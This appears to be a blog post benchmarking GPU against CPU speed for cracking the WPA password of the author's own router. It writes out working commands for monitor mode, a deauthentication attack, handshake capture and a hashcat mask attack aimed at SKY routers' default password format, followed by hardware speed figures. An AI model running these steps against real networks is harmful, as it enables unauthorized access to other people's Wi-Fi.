An interesting alternate use of GPU acceleration (aside from training neural-networks) naturally lies in the realm of password-cracking. I was curious about the speed-up this provided relative to multi-processing on the CPU and decided to try it out myself. First, I need some data.
Step A: Collecting the Data (Capturing my router’s WPA Handshake)
airmon-ng # check the name of my wireless card
airmon-ng check kill # stop processes to restart in monitoring mode
airmon-ng start wlan0 # restart in monitoring mode
airodump-ng wlan0mon # start the sniffer
airodump-ng -c (my router’s channel) –bssid (my router’s MAC) –essid (my router’s network name) -w (name of capture file) wlan0mon # Optionally specifying the network’s name just to keep track and make sure I’m not accidentally sniffing a foreign network
Now I am locked onto the channel and the frequency of SKY Router and just need to kick-off my iPhone so that it reconnects and I can capture the WPA-handshake:
aireplay-ng -0 (number of deauths) -a (my router’s MAC) -c (my iPhone’s MAC) wlan0mon # I issue 10 requests to disconnect my iPhone
The WPA handshake is successfully captured. Now I just need to clean it for Hashcat to contain only the handshake:
wpaclean (clean output name).cap (input name).cap
Finally converting it into a .hccap file:
aicrack-ng (clean output name).cap -J (final file)
Step B: Hashcat + Nvidia GTX 980
I create a small script (.bat) file with the following lines of code:
cudaHashcat64.exe -m 2500 -a3 hash_test\(final file).hccap ?u?u?u?u?u?u?u?u
This type of brute-force attack is a called a mask attack and helps me save a great deal of time. I know that SKY routers have 8 upper-case characters (producing a character-space of 208,827,064,576 possibilities).
Now the interesting stuff begins: we notice that GTX 980 is ripping through at a rate of 211,300 keys a second. At that rate we have an expected cracking-duration of around 6 days.
The average speed I was getting on the CPU (using aircrack-ng) was just below 5,000 keys a second -> more than 40x faster!
Using a slightly better CPU (Xeon E5 2687) we can up this to 7,610 keys a second:
In fact, running the same operation on a friend’s laptop (GPU-accelerated), we hit: 15,000 keys a second (3x faster )
Interestingly, I got lucky and the algorithm cracked in around 7 hours:
As an aside – running on a powerful 16-core server (E5-2667) gets us 16,240 words a second (about the same as a GPU on a mid-level gaming laptop):
Step C: Some lower-cost DIY solutions
The GTX 980 is very expensive and currently stands at around £500 (it was purchased for around £900). I was curious of a cheaper solution (getting cheaper cards on eBay and running the algorithm on multiple cards) and opted for 2 GTX 770s which I found on eBay for around £100 each used.
I decided to mount these on the top of my computer for maximum ventilation with a bit of drilling:
The end-result was interesting: hitting around 115,000 keys a second (across both cards). Which is relatively more expensive than the GTX 980, however I think a good option for those not willing to knock out £500 + on a Graphics Card!
GTX 980X – 211,300
GTX 770 – 55,000
E5-2667 (16 core) – 16,240
Laptop GPU – 15,000
E5-2687 (8 core) – 7,610
i7 4790 (4 core) – 4,530